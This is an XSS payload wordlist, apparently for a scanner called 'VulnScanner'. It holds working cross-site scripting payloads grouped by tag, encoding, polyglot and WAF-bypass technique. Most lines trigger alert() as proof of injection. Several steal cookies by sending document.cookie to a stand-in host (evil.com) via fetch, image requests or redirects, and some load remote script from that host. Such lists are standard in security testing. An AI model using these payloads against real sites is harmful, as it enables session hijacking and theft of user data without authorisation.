# XSS Payloads Wordlist
# VulnScanner - XSS Detection
# Categories: Basic, Event Handlers, SVG, Encoded, Polyglot, WAF Bypass

# ===== BASIC SCRIPT TAGS =====
<script>alert(1)</script>
<script>alert('XSS')</script>
<script>alert("XSS")</script>
<script>alert(document.cookie)</script>
<script>alert(document.domain)</script>
<script>alert(String.fromCharCode(88,83,83))</script>
<script>confirm(1)</script>
<script>prompt(1)</script>
<script>console.log(1)</script>
<script src=//evil.com/xss.js></script>
<script src="https://evil.com/xss.js"></script>
<script>new Image().src="http://evil.com/?c="+document.cookie</script>
<script>document.location='http://evil.com/?c='+document.cookie</script>
<script>fetch('http://evil.com/?c='+document.cookie)</script>

# ===== SCRIPT TAG VARIATIONS =====
<SCRIPT>alert(1)</SCRIPT>
<ScRiPt>alert(1)</ScRiPt>
<scr<script>ipt>alert(1)</scr</script>ipt>
<script >alert(1)</script>
<script/src=//evil.com/xss.js>
<script\x20type="text/javascript">alert(1)</script>
<script\x0dtype="text/javascript">alert(1)</script>
<script\x09type="text/javascript">alert(1)</script>
<script\x0ctype="text/javascript">alert(1)</script>
<script\x0atype="text/javascript">alert(1)</script>
<script\x0btype="text/javascript">alert(1)</script>

# ===== IMG TAG PAYLOADS =====
<img src=x onerror=alert(1)>
<img src=x onerror="alert(1)">
<img src=x onerror='alert(1)'>
<img src="x" onerror="alert(1)">
<img/src=x onerror=alert(1)>
<img src=x:x onerror=alert(1)>
<img src=x\x00onerror=alert(1)>
<img src="javascript:alert(1)">
<img src=1 href=1 onerror=alert(1)>
<img src=1 onmouseover=alert(1)>
<img src=1 alt=al lang=ert onerror=top[alt+lang](1)>
<img src=# onmouseover=alert(1)>
<img src=/ onerror=alert(1)>
<img dynsrc=javascript:alert(1)>
<img lowsrc=javascript:alert(1)>

# ===== SVG PAYLOADS =====
<svg onload=alert(1)>
<svg/onload=alert(1)>
<svg onload="alert(1)">
<svg/onload="alert(1)">
<svg onload=alert`1`>
<svg/onload=alert`1`>
<svg id=x onfocusin=alert(1)>
<svg><script>alert(1)</script></svg>
<svg><script href=//evil.com/xss.js></script></svg>
<svg><animate onbegin=alert(1)>
<svg><set onbegin=alert(1)>
<svg><animate attributeName=x dur=1s onend=alert(1)>
<svg><handler onclick=alert(1)>
<svg><desc><![CDATA[</desc><script>alert(1)</script>]]></desc></svg>
<svg><foreignObject><script>alert(1)</script></foreignObject></svg>
<svg><a xlink:href="javascript:alert(1)"><text>click</text></a></svg>
<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)"/>

# ===== BODY/HTML TAG PAYLOADS =====
<body onload=alert(1)>
<body onpageshow=alert(1)>
<body onfocus=alert(1)>
<body onhashchange=alert(1)><a href=#x>click</a>
<body onscroll=alert(1)><div style=height:1000px></div><div id=x></div>
<body onresize=alert(1)>
<body background="javascript:alert(1)">

# ===== INPUT TAG PAYLOADS =====
<input onfocus=alert(1) autofocus>
<input onblur=alert(1) autofocus><input autofocus>
<input onfocus=alert(1) autofocus type=image>
<input type=image src=x onerror=alert(1)>
<input type="text" onmouseover="alert(1)">
<input value="x" onclick="alert(1)">
<input type="text" value="" onfocus="alert(1)">

# ===== ANCHOR TAG PAYLOADS =====
<a href="javascript:alert(1)">click</a>
<a href="javascript:alert(1)">
<a href=javascript:alert(1)>click</a>
<a href="javascript:confirm(1)">
<a href="data:text/html,<script>alert(1)</script>">
<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">
<a href="\x01javascript:alert(1)">
<a href="javascript\x3aalert(1)">
<a id="a"><a id="a" name="a" href="javascript:alert(1)"></a>

# ===== IFRAME PAYLOADS =====
<iframe src="javascript:alert(1)">
<iframe src="javascript:alert(1)"></iframe>
<iframe srcdoc="<script>alert(1)</script>">
<iframe srcdoc="&lt;script&gt;alert(1)&lt;/script&gt;">
<iframe src="data:text/html,<script>alert(1)</script>">
<iframe src="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">
<iframe onload=alert(1)>
<iframe onload="alert(1)">
<iframe src=x onload=alert(1)>

# ===== OBJECT/EMBED PAYLOADS =====
<object data="javascript:alert(1)">
<object data="data:text/html,<script>alert(1)</script>">
<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==">
<embed src="javascript:alert(1)">
<embed src="data:text/html,<script>alert(1)</script>">
<embed src=x onload=alert(1)>

# ===== FORM PAYLOADS =====
<form action="javascript:alert(1)"><input type=submit>
<form onsubmit=alert(1)><input type=submit>
<form><button formaction="javascript:alert(1)">click
<form id=x action="javascript:alert(1)"></form><input form=x type=submit>
<form><input type=submit formaction="javascript:alert(1)">

# ===== DETAILS/MARQUEE PAYLOADS =====
<details open ontoggle=alert(1)>
<details ontoggle=alert(1) open>
<details/ontoggle=alert(1) open>
<marquee onstart=alert(1)>
<marquee onfinish=alert(1) loop=1>
<marquee onbounce=alert(1) behavior=alternate loop=1 width=1>

# ===== AUDIO/VIDEO PAYLOADS =====
<audio src=x onerror=alert(1)>
<audio onerror=alert(1) src=x>
<audio><source onerror=alert(1)>
<video src=x onerror=alert(1)>
<video onerror=alert(1) src=x>
<video><source onerror=alert(1)>
<video poster=javascript:alert(1)>

# ===== TABLE PAYLOADS =====
<table background="javascript:alert(1)">
<table><td background="javascript:alert(1)">

# ===== STYLE PAYLOADS =====
<style>@import'javascript:alert(1)'</style>
<style>body{background:url(javascript:alert(1))}</style>
<div style=background:url(javascript:alert(1))>
<div style="width:expression(alert(1))">

# ===== MATH PAYLOADS =====
<math><maction actiontype="toggle" selection="1"><mglyph></mglyph><mtext onclick="alert(1)">click</mtext></maction></math>
<math href="javascript:alert(1)">click</math>

# ===== EVENT HANDLERS =====
" onmouseover=alert(1) x="
' onmouseover=alert(1) x='
" onfocus=alert(1) autofocus x="
' onfocus=alert(1) autofocus x='
" onclick=alert(1) x="
' onclick=alert(1) x='
" onerror=alert(1) x="
' onerror=alert(1) x='
" onload=alert(1) x="
' onload=alert(1) x='

# ===== BREAKING OUT OF ATTRIBUTES =====
"><script>alert(1)</script>
'><script>alert(1)</script>
"><img src=x onerror=alert(1)>
'><img src=x onerror=alert(1)>
"><svg onload=alert(1)>
'><svg onload=alert(1)>
"onmouseover="alert(1)
'onmouseover='alert(1)
" onmouseover=alert(1)//
' onmouseover=alert(1)//
" autofocus onfocus=alert(1)//
' autofocus onfocus=alert(1)//

# ===== BREAKING OUT OF SCRIPT =====
</script><script>alert(1)</script>
</ScRiPt><ScRiPt>alert(1)</ScRiPt>
'-alert(1)-'
"-alert(1)-"
'-alert(1)//
"-alert(1)//
\'-alert(1)//
\"-alert(1)//
</script><img src=x onerror=alert(1)>
</script><svg onload=alert(1)>

# ===== ENCODED PAYLOADS =====
%3Cscript%3Ealert(1)%3C/script%3E
%3Cimg%20src=x%20onerror=alert(1)%3E
%3Csvg%20onload=alert(1)%3E
&lt;script&gt;alert(1)&lt;/script&gt;
&#60;script&#62;alert(1)&#60;/script&#62;
&#x3C;script&#x3E;alert(1)&#x3C;/script&#x3E;
\x3Cscript\x3Ealert(1)\x3C/script\x3E
\u003Cscript\u003Ealert(1)\u003C/script\u003E

# ===== DOUBLE ENCODING =====
%253Cscript%253Ealert(1)%253C%252Fscript%253E
%252522%25253E%25253Cscript%25253Ealert(1)%25253C%252Fscript%25253E

# ===== POLYGLOT PAYLOADS =====
jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcLiCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
'">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouseover=prompt(1)><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>'-->"></script><script>alert(1)</script>"><img/id="confirm&lpar;1)"/alt="/"src="/"onerror=eval(id&%23telerik
" onclick=alert(1)//<button ' onclick=alert(1)//> */ alert(1)//
'">><marquee><img src=x onerror=confirm(1)></marquee>"></plaintext\></|\><plaintext/onmouseover=prompt(1)>

# ===== WAF BYPASS PAYLOADS =====
<img src=x onerror=alert`1`>
<svg onload=alert`1`>
<script>alert`1`</script>
<img src=x onerror=\u0061lert(1)>
<img src=x onerror=al\u0065rt(1)>
<script>\u0061lert(1)</script>
<script>eval(atob('YWxlcnQoMSk='))</script>
<img src=x onerror="eval(atob('YWxlcnQoMSk='))">
<script>eval(String.fromCharCode(97,108,101,114,116,40,49,41))</script>
<svg/onload=alert(1)>
<svg	onload=alert(1)>
<svg
onload=alert(1)>
<img/src=x/onerror=alert(1)>
<img	src=x	onerror=alert(1)>
<script>alert(1)//</script>
<script>alert(1)<!--</script>
<script>alert(1)%0d%0a</script>
<<script>alert(1)//<</script>
<script x>alert(1)</script x>
<script>/**/alert(1)/**/</script>
<script>a]]]]]lert(1)</script>

# ===== MUTATION XSS =====
<noscript><p title="</noscript><script>alert(1)</script>">
<style><style/><script>alert(1)</script>
<listing><img src=x onerror=alert(1)>

# ===== DOM XSS PAYLOADS =====
#<script>alert(1)</script>
#"><script>alert(1)</script>
?param=<script>alert(1)</script>
?param="><script>alert(1)</script>
?default=<script>alert(1)</script>
javascript:alert(1)//

# ===== TEMPLATE INJECTION (Angular, Vue, etc) =====
{{constructor.constructor('alert(1)')()}}
{{$on.constructor('alert(1)')()}}
{{alert(1)}}
${alert(1)}
${{alert(1)}}
#{alert(1)}
*{alert(1)}
@{alert(1)}
%{alert(1)}

# ===== CDATA/XML PAYLOADS =====
<![CDATA[<script>alert(1)</script>]]>
<xml><script>alert(1)</script></xml>